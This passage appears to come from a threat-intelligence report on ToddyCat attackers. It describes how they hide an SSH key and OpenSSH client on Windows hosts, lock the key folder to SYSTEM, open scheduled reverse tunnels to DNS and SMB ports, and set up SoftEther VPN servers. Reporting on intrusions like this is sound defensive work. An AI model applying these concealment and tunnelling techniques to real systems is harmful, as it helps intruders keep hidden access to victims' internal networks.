To set up these tunnels, the attackers simply use the SSH client from the OpenSSH toolkit for Windows together with the openssh library required to run it and a private key file that allows the endpoint to authenticate to the server.

The OpenSSH client is dropped in the regular C:Program FilesOpenSSH location since its presence on a system would not necessarily be suspicious. However, the private key file received an .ini or .dat extension to hide its true purpose and was placed in the C:WindowsAppReadiness folder. This folder is used by the Windows AppReadiness service to store application files for initial Windows or user configuration.

Furthermore, the attackers execute a script called a.bat which changes the directory ownership of this folder to make it only accessible to the SYSTEM user and inaccessible to regular users and Administrators.

The SSH tunnel will be started by a scheduled task and will be used to tunnel traffic from the attackers’ server to a local service. For example, a connection from user systemtest01 will tunnel traffic from port 31481 on the server to local port 53 (DNS) while a connection from user systemtest05 will redirect traffic from the malicious server to port 445, normally used by the SMB service. This will allow the attackers to interact with those local services remotely over the SSH tunnel.

For example, if the local system is a domain controller, it will likely run a DNS server on port 53 which can be queried to discover internal network hostnames. On the other hand, SMB is used for file sharing and could give access to local file shares on the server.

VPN connections have been set up on compromised servers

The ToddyCat attackers were also observed setting up virtual private network (VPN) servers on compromised systems by using the open-source SoftEther VPN software in order to be able to remotely connect to those systems. SoftEther supports multiple VPN protocols including L2TP/IPsec, OpenVPN, MS-SSTP, L2TPv3, EtherIP and others.